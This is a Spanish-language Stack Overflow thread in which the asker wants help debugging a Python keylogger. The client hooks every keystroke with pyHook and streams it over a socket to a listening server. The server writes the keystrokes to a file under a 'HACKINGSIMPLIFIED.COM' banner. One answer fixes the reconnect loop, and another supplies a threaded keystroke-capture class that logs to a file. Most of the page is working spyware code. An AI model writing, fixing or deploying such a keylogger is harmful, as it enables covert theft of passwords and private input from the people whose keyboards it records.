# hook me saca del bucle while ayuda

Tags: python

Hola alguien puede ayudarme con esto esque me dijeron pero n ose como solucionarlo todavia:
cliente:

```
import socket
import pyHook,pythoncom,sys,logging
import threading
servidor = "127.0.0.1"
puerto = 39421
def OnKeyboardEvent(event):
    try:
        k=chr(event.Ascii)
        server1.send(k)
        #print str(k)
    except:
        pass



while True:
    server1=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    loop1='on'
    while loop1=='on':
        server1.connect((servidor,puerto))
        loop1='off'
    hooks_manager=pyHook.HookManager()
    hooks_manager.KeyDown=OnKeyboardEvent
    hooks_manager.HookKeyboard()
    pythoncom.PumpMessages()
```

servidor:

```
import socket
import threading
import os
def administrar_clientes(socket_cliente):

    #peticion = socket_cliente.recv(16384)
    #print "[*] Mensaje recibido: %s" % peticion
    #socket_cliente.close()
    #wait for one incoming connection
    print "connection from"+"hola"

    a=0
    count=0
    os.system('cls')
    f=open('keystrokes.txt','w')
    f.close()
    print '1.) started for--->'+str("hola")
    while a==0:
        data=cliente.recv(16384)#rec data of 16 kb limit at a time
        if data==' ':
            spacecount+=1
            if spacecount%8==0:
                f=open('keystrokes.txt','a')
                f.write("\n")
                f.close()

        f=open('keystrokes.txt','a')
        f.write(data)
        f.close()
        count+=1
        os.system('cls')
        print 'started for--->'+'         HACKINGSIMPLIFIED.COM'
        print str(count)+" keystrokes recived"

ip = "0.0.0.0"
puerto = 39421
max_conexiones = 5
servidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

servidor.bind((ip, puerto))
servidor.listen(max_conexiones)
print "[*] Esperando conexiones en %s:%d" % (ip, puerto)

while True:
    cliente, direccion = servidor.accept()
    administrador_de_clientes = threading.Thread(target=administrar_clientes, args=(cliente,))
    administrador_de_clientes.start()
```

el problema es el cliente me saca del bucle while con pyhook. me dijeron poner un thread pero lo intente pero no funciono? alguien que sepa?

Comment: Esta pregunta es duplicada de esta otra [http://es.stackoverflow.com/questions/19807/excepcion-cliente-pierde-la-conexion-servidor-desconectado](http://es.stackoverflow.com/questions/19807/excepcion-cliente-pierde-la-conexion-servidor-desconectado). No entiendo la necesidad de tener dos cuentas y hacer las mismas preguntas en ambas. Es, por lo menos, confuso.

Comment: no puedo loguerme en la otra cuenta para borrarla me da un error al meterme en login y no me responden

Comment: También estaría bien ver qué es éso que has probado de "poner un thread" y no te ha funcionado por si pudiéramos darte alguna idea. Piensa que este foro no es sólo para ayudarte a tí, sino también a otra gente que tenga el mismo problema.

Comment: ok gracias si probe el thread pero me empieza a mandar muchas keys y pobre a mandar un paquete recibirlo para comprobar si el servidor esta conectado con una excepcion pero nada porque las teclas no las pillaba bien asi que ni idea de como poder usar el pyhook sin que me saque del while y me mande las teclas

Answer (score 2):

Te saca del `while` porque estás forzando a que se cierre. Si no me equivoco te refieres a este.

```
while loop1=='on':
    server1.connect((servidor,puerto))
    loop1='off'
```

Esto significa, mientras que `loop1` sea `on`, pasa algo, y entre ese algo es cambiar ese valor por `off`, deberías hacer un `if` en vez de un `while`.

```
if loop1=='on':
    server1.connect((servidor,puerto))
    loop1='off'
```

Eso para que ocurra una sola vez. Pero eso tampoco me parece lógico, ya que si hay un `while` es por algo, así que supongo que hay que hacer un `while` y luego un `if` con la respuesta del `server1`, de esta manera.

```
while loop1=='on':
    conectado = server1.connect((servidor,puerto))
    if conectado==False:
        loop1='off'
```

Answer (score 1):

```
import pyHook,pythoncom

from threadComm import Thread

from os import SEEK_END as END

 

class bindKeyboard(Thread):

    def __init__(self,work=True,write=False,name_file='text.txt'):

        self.wk=work;self.wr=write;self.nf=name_file

        Thread.__init__(self)

 

    def work(self,event):

        print 'Ascii:', unichr(event.Ascii)

 

    def run(self):

        h = keyboard(self.wk,self.wr,self.nf)

        h.work = self.work

        h.bindMessages()

 

class keyboard(pyHook.HookManager):

    def __init__(self,work=True,write=False,name_file=None):

        self._work = work

        self._write = write

        self._name_file = name_file

        pyHook.HookManager.__init__(self)

        self.HookKeyboard()

        self.KeyDown = self.__keyDown

 

    def __write_in_file(self,data,key):

        f = open(self._name_file,"a")

        if key == 'Back':

            f.seek(-1,END)

            f.truncate()

        elif key == 'Return':

            f.write('\n')

        elif key == 'Space':

            f.write(' ')

        else:

            f.write(data.encode('utf-8'))

        f.close()

 

    def __keyDown(self,event):

        if self._work == True: self.work(event)

        if self._write == True: self.__write_in_file(unichr(event.Ascii),event.Key)

        return 1

 

    def bindMessages(self):

        pythoncom.PumpMessages()
```

Hace un tiempo cree este script para que pudiera funcionar en un thread y threadCom es otro script para utilizar thread de pyqt si no quieres usar threadCom puedes usar thread de la libreria estandar de python para usarlo

```
from bindKeyboard import bindKeyboard
Import time

bind = bindKeyboard()
bind.start()
time.sleep(10)
```